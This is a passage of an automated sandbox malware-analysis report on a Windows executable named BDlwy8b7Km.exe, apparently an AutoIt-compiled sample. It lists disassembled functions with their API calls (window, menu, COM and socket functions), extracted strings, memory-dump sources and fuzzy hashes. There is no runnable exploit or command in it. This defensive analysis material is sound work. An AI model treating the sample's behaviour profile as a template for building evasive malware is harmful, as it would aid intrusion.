                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\BDlwy8b7Km.exe
                                                  • API String ID: 2506810119-2321768384
                                                  • Opcode ID: 7995c119a31a41a1bc24dde454e7edfcdb18405aea65ea566da29e8ad07d322e
                                                  • Instruction ID: e0351ad8d5a66c9df757f50556ad04dac16b5b3ba5a402db07077d325d1a51c1
                                                  • Opcode Fuzzy Hash: 7995c119a31a41a1bc24dde454e7edfcdb18405aea65ea566da29e8ad07d322e
                                                  • Instruction Fuzzy Hash: 9E319F75A04608AFDB21DFD99C85E9EBFFCFB86310B14416AE404D7212D6B09A80CB94
                                                  Function 005FC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005FC306
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 005FC34C
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00661990,01634670), ref: 005FC395
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem
                                                  • String ID: 0
                                                  • API String ID: 135850232-4108050209
                                                  • Opcode ID: 7f2d9a961e427f6f213825e63fcc775f1ac0ef480153676f51c36f017f516d5c
                                                  • Instruction ID: d9cc4c2b6979c3e494ed833049204e7cc743402f3b1721b0abb17ed610ff9795
                                                  • Opcode Fuzzy Hash: 7f2d9a961e427f6f213825e63fcc775f1ac0ef480153676f51c36f017f516d5c
                                                  • Instruction Fuzzy Hash: BC417E3120430A9FD724DF25D944B6ABFE8BF85360F148A2DFAA5972D1D734E904CB52
                                                  Function 00624416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0062CC08,00000000,?,?,?,?), ref: 006244AA
                                                  • GetWindowLongW.USER32 ref: 006244C7
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006244D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 32e291199dea7bf99729463f4fbba70d4902b1fdcf9051ac9f5551d1a2f8ae7b
                                                  • Instruction ID: 8bdce53d05ee5e65cf1ea6da6501b4ad2b0c6debb16bcb9ce59325a64d8f9c37
                                                  • Opcode Fuzzy Hash: 32e291199dea7bf99729463f4fbba70d4902b1fdcf9051ac9f5551d1a2f8ae7b
                                                  • Instruction Fuzzy Hash: 0231AF31200A26AFDF209E38EC45BDA7BAAEF49334F204315F975A22D0DB70EC519B50
                                                  Function 005F6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysReAllocString.OLEAUT32(?,?), ref: 005F6EED
                                                  • VariantCopyInd.OLEAUT32(?,?), ref: 005F6F08
                                                  • VariantClear.OLEAUT32(?), ref: 005F6F12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyString
                                                  • String ID: *j_
                                                  • API String ID: 2173805711-2925385068
                                                  • Opcode ID: d521d88a91273c25314c4a77bdc8facbb4c17a745527851a1caa34984325b28e
                                                  • Instruction ID: 15252ac5b4c6b936158ef526eb47fd0fae345ea6588913be69d5585366d95368
                                                  • Opcode Fuzzy Hash: d521d88a91273c25314c4a77bdc8facbb4c17a745527851a1caa34984325b28e
                                                  • Instruction Fuzzy Hash: 7C31B37160425ADFDF04AF64E8549BE3FB6FF85300B140898FA024B2A1D7389952DBD0
                                                  Function 0061304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0061335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00613077,?,?), ref: 00613378
                                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0061307A
                                                  • _wcslen.LIBCMT ref: 0061309B
                                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00613106
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 946324512-2422070025
                                                  • Opcode ID: db56fbbd7c2cf36c215f2873bb2ea5d4a90fc94228952d16a4c5893a0e94d6ae
                                                  • Instruction ID: 5f272110c802dd61bee3429893549bd248f6648ce5784671a8dbc2c6a68f47c9
                                                  • Opcode Fuzzy Hash: db56fbbd7c2cf36c215f2873bb2ea5d4a90fc94228952d16a4c5893a0e94d6ae
                                                  • Instruction Fuzzy Hash: BF31E7356002119FCB20CF29C586EE97BF2EF59318F28C099E9168B392D771EE85C760
                                                  Function 00624653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00624705
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00624713
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0062471A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: 5ca5668b32119a874a718def9d6fec1b2e7bba67ca752177031d41f5c23dcc26
                                                  • Instruction ID: d9d21dd5c7b7870c0a0e1b8d836835aa4e6ef79686b499fae8679a147ed8dbbd
                                                  • Opcode Fuzzy Hash: 5ca5668b32119a874a718def9d6fec1b2e7bba67ca752177031d41f5c23dcc26
                                                  • Instruction Fuzzy Hash: AD215EB5600619AFDB10DF64ECD5DAB3BAEEB9A3A4B040159FA149B351CB70EC11CE60
                                                  Function 005F95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 176396367-2734436370
                                                  • Opcode ID: 03726ad25d251a3ad604a794d224bb49632cf5ff4055ab769c7aa1cb0d86c29e
                                                  • Instruction ID: f7536d197789d628f52422206352c98f29aff3a174df33feb96396444ac27be0
                                                  • Opcode Fuzzy Hash: 03726ad25d251a3ad604a794d224bb49632cf5ff4055ab769c7aa1cb0d86c29e
                                                  • Instruction Fuzzy Hash: 3521383210492A66C731AB24DC06FBB7BDDFFD5300F104426FA49DB041EB59AD41C2D5
                                                  Function 006237B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00623840
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00623850
                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00623876
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: f9f03b8d48a8c058b675256f019ae2b50500b674c6344dc14ea2b704a072285e
                                                  • Instruction ID: 67feeb6ff17369d5c0bce4d93671eef03f29beecf5986948c7975bb162bcf59a
                                                  • Opcode Fuzzy Hash: f9f03b8d48a8c058b675256f019ae2b50500b674c6344dc14ea2b704a072285e
                                                  • Instruction Fuzzy Hash: 5B218072610629BBEF218F54EC85EEB376BEF89760F118114F9059B290C779DC528BA0
                                                  Function 006049F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00604A08
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00604A5C
                                                  • SetErrorMode.KERNEL32(00000000,?,?,0062CC08), ref: 00604AD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume
                                                  • String ID: %lu
                                                  • API String ID: 2507767853-685833217
                                                  • Opcode ID: 6e45abe668c8286874f531449d40f4a61b5c9a0398fa4a38750a6b146b559cf5
                                                  • Instruction ID: 4dd4ae02ce109d2a15379984ba64008e89b3c7af9cc3a4ae5ee41ccbf270ce91
                                                  • Opcode Fuzzy Hash: 6e45abe668c8286874f531449d40f4a61b5c9a0398fa4a38750a6b146b559cf5
                                                  • Instruction Fuzzy Hash: 40314F71A00109AFDB10DF54C885EAE7BF9EF48314F148099E905DB252DB71EE46CB61
                                                  Function 006241EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0062424F
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00624264
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00624271
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: a1a97aad2f28f1ba5f2664d1823b03500257cc5c3a20f6e882706a7906fb844e
                                                  • Instruction ID: fdfd5405447f0fbfb1f37873a368bd9b05062723782e6d3b0b62945cf30772d2
                                                  • Opcode Fuzzy Hash: a1a97aad2f28f1ba5f2664d1823b03500257cc5c3a20f6e882706a7906fb844e
                                                  • Instruction Fuzzy Hash: D2110631240218BEEF205F29DC06FEB3BAEEF85B64F010114FA55E6190D6B1DC219B20
                                                  Function 005F2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                    • Part of subcall function 005F2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 005F2DC5
                                                    • Part of subcall function 005F2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F2DD6
                                                    • Part of subcall function 005F2DA7: GetCurrentThreadId.KERNEL32 ref: 005F2DDD
                                                    • Part of subcall function 005F2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 005F2DE4
                                                  • GetFocus.USER32 ref: 005F2F78
                                                    • Part of subcall function 005F2DEE: GetParent.USER32(00000000), ref: 005F2DF9
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 005F2FC3
                                                  • EnumChildWindows.USER32(?,005F303B), ref: 005F2FEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                  • String ID: %s%d
                                                  • API String ID: 1272988791-1110647743
                                                  • Opcode ID: c4b9452cc1bd3f4dccc1b5c2f9dfed79db5accc1de3e31b9f29ce2ce40eeb780
                                                  • Instruction ID: b33e2d08a4ebb491b4b964c3589d89791404b9dd7e86b8a509f4207cde274df6
                                                  • Opcode Fuzzy Hash: c4b9452cc1bd3f4dccc1b5c2f9dfed79db5accc1de3e31b9f29ce2ce40eeb780
                                                  • Instruction Fuzzy Hash: 5B11A2B160020A6BDF14BF608C89EFD3B6ABFC4314F044075BA099B152DE74994A8B60
                                                  Function 00625882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006258C1
                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006258EE
                                                  • DrawMenuBar.USER32(?), ref: 006258FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Menu$InfoItem$Draw
                                                  • String ID: 0
                                                  • API String ID: 3227129158-4108050209
                                                  • Opcode ID: e1245942ce0350b3cb62ed2e75f371bcc2107b3952b66c086ed1606363ee02c9
                                                  • Instruction ID: 9cc2ffc3a72e5a16bd773df5441b4fb7d09053bd4c5a3a56211c05643b45fb1b
                                                  • Opcode Fuzzy Hash: e1245942ce0350b3cb62ed2e75f371bcc2107b3952b66c086ed1606363ee02c9
                                                  • Instruction Fuzzy Hash: C801C431500618EFDB309F51EC44BEEBBBAFF45360F108099E849D6251DB308A95DF20
                                                  Function 005F007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d851a9ba7bfbfab8dc6da4bf329c97a765a8281991303e22ea8e70a16546f42
                                                  • Instruction ID: 3489276465ceee6a94968e81fbf52c9d3ad3b3cd7af10588d894739266ea7cf0
                                                  • Opcode Fuzzy Hash: 4d851a9ba7bfbfab8dc6da4bf329c97a765a8281991303e22ea8e70a16546f42
                                                  • Instruction Fuzzy Hash: E5C15A75A0021AAFCB14CF94C894EBEBBB5FF48314F249598E605EB292C735ED41DB90
                                                  Function 0061342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInitInitializeUninitialize
                                                  • String ID:
                                                  • API String ID: 1998397398-0
                                                  • Opcode ID: bb13eb3325826d5b8d6aa4e713ef60c65a610fc415397090406c328154f53da1
                                                  • Instruction ID: 4b99a7cdab42bb5821b0ae3375d2ed2658a531e9d57e096c9c24e3146645ec83
                                                  • Opcode Fuzzy Hash: bb13eb3325826d5b8d6aa4e713ef60c65a610fc415397090406c328154f53da1
                                                  • Instruction Fuzzy Hash: 72A14B752082119FDB10DF24C585A6ABBE6FF8C710F098859F98A9B361DB30ED41CB91
                                                  Function 005F0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F05F0
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F0608
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,0062CC40,000000FF,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F062D
                                                  • _memcmp.LIBVCRUNTIME ref: 005F064E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
